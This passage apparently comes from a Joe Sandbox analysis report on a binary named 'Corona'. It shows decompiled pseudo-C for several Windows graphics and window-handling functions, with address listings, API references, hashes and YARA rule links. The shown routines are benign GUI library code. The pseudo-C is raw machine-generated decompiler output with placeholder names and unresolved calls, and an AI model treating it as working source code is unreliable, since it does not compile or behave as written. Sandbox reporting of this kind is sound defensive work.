                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00421F4B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00421F00
                                  • 72E7B410.GDI32(?,00000000,000000FF,00421F52,00000000,?,00000000,00000000,00421F4B,?,?,00000000,00000001,00000001,00000001,00000001), ref: 00421F32
                                  • SelectObject.GDI32(?,?), ref: 00421F3F
                                  • DeleteObject.GDI32(00000000), ref: 00421F45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                  • String ID: ($BM
                                  • API String ID: 3415089252-2980357723
                                  • Opcode ID: c1694a23d20e7c26f37fb0fe935c7ad1abeed6687539bcd0167cf8475e2bcb6d
                                  • Instruction ID: 6c276c34b4382dc2fc42aee856c54ea09dee44fbe49ed7c999c9d8d60e446c0b
                                  • Opcode Fuzzy Hash: c1694a23d20e7c26f37fb0fe935c7ad1abeed6687539bcd0167cf8475e2bcb6d
                                  • Instruction Fuzzy Hash: 61D16F74A002189FDF04DFA9D985BAEBBF5FF48304F51846AE914EB395D7389840CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042138C, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E0042138C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				intOrPtr _t78;
				struct HDC__* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				char _t85;
				void* _t92;
				struct HDC__* _t115;
				void* _t136;
				struct HDC__* _t160;
				intOrPtr* _t164;
				intOrPtr _t172;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				int* _t184;
				intOrPtr _t186;
				void* _t188;
				void* _t189;
				intOrPtr _t190;

				_t165 = __ecx;
				_t188 = _t189;
				_t190 = _t189 + 0xffffffe4;
				_t184 = __ecx;
				_v8 = __edx;
				_t164 = __eax;
				_t186 =  *((intOrPtr*)(__eax + 0x28));
				_t172 =  *0x4215d8; // 0xf
				E0041D3A0(_v8, __ecx, _t172);
				E0042191C(_t164);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *((intOrPtr*)(_t186 + 0x10));
				if(_t78 != 0) {
					_push(0xffffffff);
					_push(_t78);
					_t160 =  *(_v8 + 4);
					_push(_t160);
					L0040619C();
					_v12 = _t160;
					_push( *(_v8 + 4));
					L0040616C();
					_v13 = 1;
				}
				_push(0xc);
				_t80 =  *(_v8 + 4);
				_push(_t80);
				L004060D4();
				_push(_t80);
				_push(0xe);
				_t82 =  *(_v8 + 4);
				L004060D4();
				_t83 = _t82;
				_t84 = _t83 * _t82;
				if(_t84 > 8) {
					L4:
					_t85 = 0;
				} else {
					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
						_t85 = 1;
					} else {
						goto L4;
					}
				}
				if(_t85 == 0) {
					if(E00421718(_t164) == 0) {
						SetStretchBltMode(E0041D2CC(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t188);
				_push(0x4215c8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
					E004218BC(_t164, _t165);
				}
				_t92 = E0042165C(_t164);
				_t176 =  *0x4215d8; // 0xf
				E0041D3A0(_t92, _t165, _t176);
				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t184, _t184[1], _t184[2] -  *_t184, _t184[3] - _t184[1],  *(E0042165C(_t164) + 4), 0, 0,  *(_t186 + 0x1c),  *(_t186 + 0x20),  *(_v8 + 0x20));
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x4215cf);
					if(_v13 != 0) {
						_push(0xffffffff);
						_push(_v12);
						_t115 =  *(_v8 + 4);
						_push(_t115);
						L0040619C();
						return _t115;
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t188);
					_push(0x42155d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t190;
					L0040603C();
					_v28 = E0041D6C4(0);
					_v32 = SelectObject(_v28,  *(_t186 + 0xc));
					E0041D868( *(_v8 + 4), _t164, _t184[1],  *_t184, _t184, _t186, 0, 0, _v28,  *(_t186 + 0x20),  *(_t186 + 0x1c), 0, 0,  *(E0042165C(_t164) + 4), _t184[3] - _t184[1], _t184[2] -  *_t184);
					_t136 = 0;
					_t180 = 0;
					 *[fs:eax] = _t180;
					_push(0x4215a2);
					if(_v32 != 0) {
						_t136 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t136;
				}
			}





























                                  0x0042138c
                                  0x0042138d
                                  0x0042138f
                                  0x00421395
                                  0x00421397
                                  0x0042139a
                                  0x0042139c
                                  0x0042139f
                                  0x004213a8
                                  0x004213af
                                  0x004213b6
                                  0x004213b9
                                  0x004213bd
                                  0x004213c2
                                  0x004213c4
                                  0x004213c6
                                  0x004213ca
                                  0x004213cd
                                  0x004213ce
                                  0x004213d3
                                  0x004213dc
                                  0x004213dd
                                  0x004213e2
                                  0x004213e2
                                  0x004213e6
                                  0x004213eb
                                  0x004213ee
                                  0x004213ef
                                  0x004213f4
                                  0x004213f5
                                  0x004213fa
                                  0x004213fe
                                  0x00421405
                                  0x00421406
                                  0x0042140b
                                  0x0042141c
                                  0x0042141c
                                  0x0042140d
                                  0x00421411
                                  0x0042141a
                                  0x00421420
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042141a
                                  0x00421424
                                  0x00421467
                                  0x00421474
                                  0x00421474
                                  0x00421426
                                  0x00421431
                                  0x0042143f
                                  0x00421457
                                  0x00421457
                                  0x0042147b
                                  0x0042147c
                                  0x00421481
                                  0x00421484
                                  0x00421490
                                  0x00421494
                                  0x00421494
                                  0x0042149b
                                  0x004214a0
                                  0x004214a6
                                  0x004214b4
                                  0x0042159d
                                  0x004215a4
                                  0x004215a7
                                  0x004215aa
                                  0x004215b3
                                  0x004215b5
                                  0x004215ba
                                  0x004215be
                                  0x004215c1
                                  0x004215c2
                                  0x00000000
                                  0x004215c2
                                  0x004215c7
                                  0x004214ba
                                  0x004214bc
                                  0x004214c1
                                  0x004214c6
                                  0x004214c7
                                  0x004214cc
                                  0x004214cf
                                  0x004214d4
                                  0x004214de
                                  0x004214ee
                                  0x00421528
                                  0x0042152d
                                  0x0042152f
                                  0x00421532
                                  0x00421535
                                  0x0042153e
                                  0x00421548
                                  0x00421548
                                  0x00421551
                                  0x00000000
                                  0x00421557
                                  0x0042155c
                                  0x0042155c

                                  APIs
                                    • Part of subcall function 0042191C: 72E7AC50.USER32(00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421972
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421987
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421991
                                    • Part of subcall function 0042191C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219B5
                                    • Part of subcall function 0042191C: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219C0
                                  • 72E7B410.GDI32(?,?,000000FF), ref: 004213CE
                                  • 72E7B150.GDI32(?,?,?,000000FF), ref: 004213DD
                                  • 72E7AD70.GDI32(?,0000000C), ref: 004213EF
                                  • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 004213FE
                                  • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00421431
                                  • SetStretchBltMode.GDI32(?,00000004), ref: 0042143F
                                  • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00421457
                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 00421474
                                  • 72E7A590.GDI32(00000000,00000000,0042155D,?,?,0000000E,00000000,?,0000000C), ref: 004214D4
                                  • SelectObject.GDI32(?,?), ref: 004214E9
                                  • SelectObject.GDI32(?,00000000), ref: 00421548
                                  • DeleteDC.GDI32(00000000), ref: 00421557
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                  • String ID:
                                  • API String ID: 2051775979-0
                                  • Opcode ID: 5b73ba958e488c07fecdcfe3379814d92ef0b8981f44f62b6f307e6d4985e1a9
                                  • Instruction ID: f8d248818c06f3afc7ddb4ab2b5839b80df9585e6c3c76bc2cafb61184feeb3f
                                  • Opcode Fuzzy Hash: 5b73ba958e488c07fecdcfe3379814d92ef0b8981f44f62b6f307e6d4985e1a9
                                  • Instruction Fuzzy Hash: 67715DB5B00205AFDB10EFA9C985F5EB7F8AF08304F5145AAF509E7292C638ED40CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D6D4, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0041D6D4(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L0040603C();
				_v28 = __eax;
				_push(0);
				L0040603C();
				_v32 = __eax;
				_push(_t87);
				_push(0x41d822);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L0040638C();
					_v24 = _t37;
					if(_v24 == 0) {
						E0041D61C(__ecx);
					}
					_push(_t87);
					_push(0x41d791);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00406034();
					_v20 = _t41;
					if(_v20 == 0) {
						E0041D61C(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x41d798);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L004065C4();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00406024();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E0041D829);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                  0x0041d6d5
                                  0x0041d6d7
                                  0x0041d6e2
                                  0x0041d6e3
                                  0x0041d6e4
                                  0x0041d6e6
                                  0x0041d6e9
                                  0x0041d6eb
                                  0x0041d6f0
                                  0x0041d6f3
                                  0x0041d6f5
                                  0x0041d6fa
                                  0x0041d6ff
                                  0x0041d700
                                  0x0041d705
                                  0x0041d708
                                  0x0041d715
                                  0x0041d71c
                                  0x0041d736
                                  0x0041d738
                                  0x0041d73d
                                  0x0041d744
                                  0x0041d746
                                  0x0041d746
                                  0x0041d74d
                                  0x0041d74e
                                  0x0041d753
                                  0x0041d756
                                  0x0041d75c
                                  0x0041d760
                                  0x0041d761
                                  0x0041d764
                                  0x0041d765
                                  0x0041d76a
                                  0x0041d771
                                  0x0041d773
                                  0x0041d773
                                  0x0041d77a
                                  0x0041d77d
                                  0x0041d780
                                  0x0041d785
                                  0x0041d788
                                  0x0041d789
                                  0x0041d78b
                                  0x0041d790
                                  0x0041d71e
                                  0x0041d71e
                                  0x0041d720
                                  0x0041d722
                                  0x0041d727
                                  0x0041d728
                                  0x0041d72b
                                  0x0041d72c
                                  0x0041d731
                                  0x0041d79c
                                  0x0041d7ab
                                  0x0041d7ba
                                  0x0041d7e1
                                  0x0041d7e8
                                  0x0041d7ef
                                  0x0041d7ef
                                  0x0041d7f6
                                  0x0041d7fd
                                  0x0041d7fd
                                  0x0041d7f6
                                  0x0041d804
                                  0x0041d807
                                  0x0041d80a
                                  0x0041d813
                                  0x0041d821
                                  0x0041d821

                                  APIs
                                  • 72E7A590.GDI32(00000000), ref: 0041D6EB
                                  • 72E7A590.GDI32(00000000,00000000), ref: 0041D6F5
                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041D715
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D72C
                                  • 72E7AC50.USER32(00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D738
                                  • 72E7A520.GDI32(00000000,?,?,00000000,0041D791,?,00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D765
                                  • 72E7B380.USER32(00000000,00000000,0041D798,00000000,0041D791,?,00000000,00000000,0041D822,?,00000000,00000000), ref: 0041D78B
                                  • SelectObject.GDI32(?,?), ref: 0041D7A6
                                  • SelectObject.GDI32(?,00000000), ref: 0041D7B5
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041D7E1
                                  • SelectObject.GDI32(?,00000000), ref: 0041D7EF
                                  • SelectObject.GDI32(?,00000000), ref: 0041D7FD
                                  • DeleteDC.GDI32(?), ref: 0041D813
                                  • DeleteDC.GDI32(?), ref: 0041D81C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                  • String ID:
                                  • API String ID: 956127455-0
                                  • Opcode ID: 02ce32e2b0884cbdecf92cd8213ca8aa77c6a502b501b08218de68116e50bda9
                                  • Instruction ID: 68cc4fe12e448ed7e9ee0d1cae2db1c0752f9fb96219d103ce1fcdb821cdee86
                                  • Opcode Fuzzy Hash: 02ce32e2b0884cbdecf92cd8213ca8aa77c6a502b501b08218de68116e50bda9
                                  • Instruction Fuzzy Hash: BA410DB1E40209AFDB10EBE9CC42FAFB7FCEB08704F514426B615F7281D67959518B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00435BB0, Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00435BB0(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E00434EF4(_v8);
					_push(_t120);
					L00406484();
					_v16 = _t120;
					_push(_t237);
					_push(0x435e16);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E00434EF4(_v8),  &_v32);
					GetWindowRect(E00434EF4(_v8),  &_v48);
					MapWindowPoints(0, E00434EF4(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E00434EF4(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x450e7c; // 0x4528f8
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x450e7c; // 0x4528f8
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x450aa0 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x450ab0 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x450ac0 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x450ad0 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041CC2C( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x435e1d);
					_push(_v16);
					_t171 = E00434EF4(_v8);
					_push(_t171);
					L004065C4();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E004280CC(E00427FEC());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E004285FC(E00427FEC(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















                                  0x00435bb1
                                  0x00435bb3
                                  0x00435bb9
                                  0x00435bbc
                                  0x00435bc9
                                  0x00435bde
                                  0x00435be3
                                  0x00435be4
                                  0x00435be9
                                  0x00435bee
                                  0x00435bef
                                  0x00435bf4
                                  0x00435bf7
                                  0x00435c07
                                  0x00435c19
                                  0x00435c2f
                                  0x00435c44
                                  0x00435c5d
                                  0x00435c68
                                  0x00435c69
                                  0x00435c6a
                                  0x00435c6b
                                  0x00435c7b
                                  0x00435c86
                                  0x00435c87
                                  0x00435c88
                                  0x00435c89
                                  0x00435c94
                                  0x00435c9a
                                  0x00435ca6
                                  0x00435cab
                                  0x00435cab
                                  0x00435cbb
                                  0x00435cc0
                                  0x00435cc0
                                  0x00435cd6
                                  0x00435ce2
                                  0x00435ce4
                                  0x00435ce4
                                  0x00435cf1
                                  0x00435cf3
                                  0x00435cf3
                                  0x00435d00
                                  0x00435d02
                                  0x00435d02
                                  0x00435d0b
                                  0x00435d0f
                                  0x00435d18
                                  0x00435d18
                                  0x00435d25
                                  0x00435d27
                                  0x00435d27
                                  0x00435d30
                                  0x00435d34
                                  0x00435d3d
                                  0x00435d3d
                                  0x00435d9d
                                  0x00435d9d
                                  0x00435db6
                                  0x00435dc1
                                  0x00435dc2
                                  0x00435dc3
                                  0x00435dc4
                                  0x00435dd5
                                  0x00435df1
                                  0x00435df8
                                  0x00435dfb
                                  0x00435dfe
                                  0x00435e06
                                  0x00435e0a
                                  0x00435e0f
                                  0x00435e10
                                  0x00435e15
                                  0x00435e1d
                                  0x00435e25
                                  0x00435e2d
                                  0x00435e34
                                  0x00435e36
                                  0x00435e3d
                                  0x00435e49
                                  0x00435e49
                                  0x00435e3d
                                  0x00435e54
                                  0x00435e54

                                  APIs
                                  • 72E7B080.USER32(00000000), ref: 00435BE4
                                  • GetClientRect.USER32 ref: 00435C07
                                  • GetWindowRect.USER32 ref: 00435C19
                                  • MapWindowPoints.USER32 ref: 00435C2F
                                  • OffsetRect.USER32(?,?,?), ref: 00435C44
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 00435C5D
                                  • InflateRect.USER32(?,00000000,00000000), ref: 00435C7B
                                  • GetWindowLongA.USER32 ref: 00435CD1
                                  • DrawEdge.USER32(?,?,00000000,00000008), ref: 00435D9D
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00435DB6
                                  • OffsetRect.USER32(?,?,?), ref: 00435DD5
                                  • FillRect.USER32 ref: 00435DF1
                                  • 72E7B380.USER32(00000000,?,00435E1D,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00435E10
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                  • String ID:
                                  • API String ID: 156109915-0
                                  • Opcode ID: 3384fad883c51fec84ab6df0ceddcbaafdaae6024ca56d6ca3f35e271cbc04a5
                                  • Instruction ID: 03fa4cb327c68a89ecac10a9bf4ca90d059d7edcfdca495999aa2f0fa181ebc8
                                  • Opcode Fuzzy Hash: 3384fad883c51fec84ab6df0ceddcbaafdaae6024ca56d6ca3f35e271cbc04a5
                                  • Instruction Fuzzy Hash: 50910871E00648AFDB01DBA9C985EEEB7F9AF49304F1540A6F514F7252C779AE00CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040684C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040684C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                  0x00406853
                                  0x00406855
                                  0x00406857
                                  0x00406869
                                  0x00406878
                                  0x00406884
                                  0x00406890
                                  0x00406895
                                  0x004068b4
                                  0x0040689b
                                  0x004068ab
                                  0x004068ab
                                  0x004068b9
                                  0x004068d6
                                  0x004068bf
                                  0x004068cf
                                  0x004068cf
                                  0x004068e3

                                  APIs
                                  • FindWindowA.USER32 ref: 00406864
                                  • RegisterClipboardFormatA.USER32 ref: 00406870
                                  • RegisterClipboardFormatA.USER32 ref: 0040687F
                                  • RegisterClipboardFormatA.USER32 ref: 0040688B
                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004068A3
                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004068C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  • Opcode ID: 7105a0984b65db92520d766209f43b767f911ca0ba8dee2e1c8dd6be0ea47c84
                                  • Instruction ID: 37ad1d3587d7e34cffe3625dfaa3fe9d7344b709a881614316ac92a00b249356
                                  • Opcode Fuzzy Hash: 7105a0984b65db92520d766209f43b767f911ca0ba8dee2e1c8dd6be0ea47c84
                                  • Instruction Fuzzy Hash: B1115171201305BFE710AF55DC41B26B7E8EF44710F22803BB906AB3C5D6B99D60CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004285FC, Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E004285FC(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E00434EF4(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00434EF4(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E00434EF4(_v8);
					_push(_t55);
					L00406484();
					_v12 = _t55;
					_push(_t120);
					_push(0x428757);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E00434EF4(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
